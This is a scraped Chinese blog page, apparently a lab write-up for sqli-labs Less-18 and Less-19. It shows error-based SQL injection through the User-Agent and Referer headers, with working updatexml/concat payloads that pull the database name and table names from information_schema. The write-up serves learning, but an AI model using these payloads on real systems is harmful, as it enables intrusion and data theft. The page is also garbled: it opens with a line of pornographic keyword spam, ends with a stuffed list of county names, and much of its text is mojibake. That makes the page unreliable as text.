五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

sqlilabs less-18、19

2022-09-17 15:59 作者:笨蛋灬你變了  | 我要投稿

頁(yè)面顯示

在username和password輸入各種判斷注入點(diǎn)的符號(hào)(' -- ) " ),都無(wú)回顯。

所以輸入正確username和password后顯示:

所以使用抓包軟件抓取user agent:' 顯示

''顯示,即閉合了sql語(yǔ)句。

'and order by 3' 顯示

嘗試用顯錯(cuò)updatexml函數(shù)。updatexml函數(shù)(格式:UPDATEXML (XML_document, XPath_string, new_value)。因?yàn)閏oncat()得到的字符串不符合XPath_string,所以會(huì)出現(xiàn)XPATH syntax error這個(gè)錯(cuò)誤。

'or updatexml(1,concat('#',(database())),1) or' 顯示

'or updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)or'

如此繼續(xù)。多個(gè)輸出內(nèi)容可以limit字句作輸出限制。

less-19

同less-18一樣,將user agent處改為referer即可


標(biāo)簽:

sqlilabs less-18、19的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
永嘉县| 大同市| 定陶县| 虞城县| 东乡| 泰宁县| 金塔县| 焦作市| 辛集市| 连城县| 安顺市| 杂多县| 衡水市| 奉贤区| 曲阜市| 绥阳县| 乌苏市| 宣武区| 黎城县| 准格尔旗| 姜堰市| 清水县| 南涧| 容城县| 泸定县| 梁河县| 乃东县| 米林县| 贡觉县| 潼南县| 红原县| 钦州市| 保靖县| 深泽县| 拜城县| 射洪县| 临沂市| 界首市| 卢湾区| 读书| 开江县|